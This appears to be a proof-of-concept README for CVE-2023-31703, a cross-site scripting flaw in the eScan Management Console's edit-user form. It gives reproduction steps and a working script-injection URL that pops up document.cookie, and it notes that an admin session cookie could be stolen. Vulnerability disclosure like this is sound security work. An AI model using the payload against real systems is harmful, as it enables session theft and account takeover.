CVE-2023-31703 PoC — MicroWorld eScan Management Console 跨站脚本漏洞

Source

Associated Vulnerability

Readme

## eScan Management Console 14.0.1400.2281 - Cross Site Scripting ###

**Description:**
Cross Site Scripting (XSS) in the edit user form in Microworld Technologies eScan management console 14.0.1400.2281 allows remote attacker to inject arbitrary code via the from parameter in the URL directly.

**Vulnerable Product Version:**
14.0.1400.2281

**Date:**
16/05/2023

**CVE:** 
CVE-2023-31703

**CVE Author:**
Sahil Ojha

**Vendor Homepage:**
https://www.escanav.com

**Software Link:** 
https://cl.escanav.com/ewconsole.dll

**Tested on:** 
Windows

**Steps to reproduce:**
1. Login into the eScan Management Console with a valid user credential.
2. Navigate to URL: https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from=banner&P=
3. Now, Inject the Cross Site Scripting Payload in "from" parameter as shown below and a valid XSS pop up appeared.
https://cl.escanav.com/ewconsole/ewconsole.dll/editUserName?usrid=4&from="><script>alert(document.cookie)</script>banner&P=
https://github.com/sahiloj/CVE-2023-31703/blob/main/XSS%201.png
4. By exploiting this vulnerability, any arbitrary attacker could have stolen an admin user session cookie to perform account takeover.
![HTML Render](https://github.com/sahiloj/CVE-2023-31703/blob/main/XSS%201.png)

File Snapshot

 [4.0K]  /data/pocs/7886b7c15a10521dc599ee1f63557101bc0ac418
├── [1.2K]  README.md
└── [ 25K]  XSS 1.png

0 directories, 2 files

Remarks